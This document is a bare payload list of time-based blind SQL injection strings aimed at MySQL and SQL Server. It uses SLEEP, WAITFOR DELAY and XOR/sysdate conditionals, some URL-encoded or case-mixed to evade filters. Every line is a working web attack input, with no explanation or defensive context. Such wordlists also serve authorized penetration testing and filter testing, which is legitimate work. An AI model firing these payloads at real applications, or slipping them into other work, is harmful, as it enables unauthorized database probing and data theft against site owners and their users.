'%2b(select*from(select(sleep(20)))a)%2b'
';%20waitfor%20delay%20'0:0:8'%20--%20
0'XOR(if(now()=sysdate(),sleep(10),0))XOR'Z
0'|(IF((now())LIKE(sysdate()),SLEEP(10),0))|'Z
0'or(now()=sysdate()&&SLEEP(10))or'Z
(SELECT*FROM(SELECT(SLEEP(10)))a)
',"),/*test*/%26%26%09sLeEp(30)%09--+
0'XOR(if(now()=sysdate(),sleep(4*4),0))XOR'Z
1'XOR(SELECT(1)FROM(SELECT(SLEEP(5*2)))a)XOR'Z
XOR(if(now()=sysdate()%2Csleep(7)%2C0))XOR'Z
if(now()=sysdate()%2Csleep(8)%2C0)
0"XOR(if(now()=sysdate()%2Csleep(6)%2C0))XOR"Z
0\"XOR(if(now()=sysdate(),sleep(9),0))XOR\"Z
if(now()=sysdate(),sleep(8),0)
XOR(if(now()=sysdate(),sleep(5),0))XOR
(SELECT(SLEEP(10)))cfm)%2D%2D
if(now()=sysdate()%2Csleep(4*2)%2C0)
1 waitfor delay '0:0:5' --
'; waitfor delay '0:0:8' --
(select*from(select(sleep(5)))a)
'XOR(if(now()=sysdate(),sleep(5*5),0))OR'
1;SELECT IF((8303>8302),SLEEP(9),2356)#
(SELECT(0)FROM(SELECT(SLEEP(7)))a)
